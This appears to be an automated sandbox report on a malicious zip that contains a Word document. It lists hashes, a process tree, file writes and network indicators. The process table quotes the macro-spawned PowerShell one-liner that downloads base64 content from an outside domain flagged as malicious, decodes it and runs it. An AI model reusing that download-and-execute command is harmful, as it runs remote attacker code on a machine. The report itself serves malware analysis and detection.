File name: | 57632951055459.zip |
Full analysis: | https://app.any.run/tasks/349a1624-7a12-4044-9c13-63185410876d |
Verdict: | Malicious activity |
Analysis date: | November 08, 2019, 13:21:05 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | C603EEA0E23D05205D4747BFFA808555 |
SHA1: | 78E598C27B56DFC3D1F31BE9049D3341105B676A |
SHA256: | 3E7C8498FA9B355CDF5A8A22909DC5568C0964B2DCE8362F284313017CC0C0E7 |
SSDEEP: | 3072:WS8TW83vIPNNt2fSHWUZrm6fK6bPf6xF3bibbqbv87rBaCZ:/8T58ofOWsrxfK6bPmybqAtaw |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | 893890608453136085907568.doc |
---|---|
ZipUncompressedSize: | 19922945 |
ZipCompressedSize: | 145324 |
ZipCRC: | 0x664f5a3d |
ZipModifyDate: | 2019:11:04 00:42:01 |
ZipCompression: | Deflated |
ZipBitFlag: | - |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2364 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\57632951055459.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
2776 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa2364.29670\893890608453136085907568.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
564 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ( [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( ((New-Object Net.WebClient).DownloadString('http://dbi.dbimages.com/?need=negato0&vid=dpec22&42686')) ) ) ); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2364 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa2364.29670\893890608453136085907568.doc | — | |
MD5:— | SHA256:— | |||
2776 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDB95.tmp.cvr | — | |
MD5:— | SHA256:— | |||
564 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NQ493I0I988TS9G2U9GM.temp | — | |
MD5:— | SHA256:— | |||
564 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
564 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39e75d.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2776 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIa2364.29670\~$3890608453136085907568.doc | pgc | |
MD5:CAF5C2954262C25D55F75B61B172E831 | SHA256:F67658EC4030DE5613C90D157572C5EB80D171B09DB976F3304333CCF1854984 | |||
2776 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:0D4854A748A4D9022A5AEF0D79BFC571 | SHA256:098531C8AEF6577D5E90FCDBEE58EA0A02D37B6AEC174EFDFF1B2F1D543BDD87 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
564 | powershell.exe | GET | — | 185.158.249.113:80 | http://dbi.dbimages.com/?need=negato0&vid=dpec22&42686 | NL | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
564 | powershell.exe | 185.158.249.113:80 | dbi.dbimages.com | easystores GmbH | NL | malicious |
Domain | IP | Reputation |
---|---|---|
dbi.dbimages.com |
| malicious |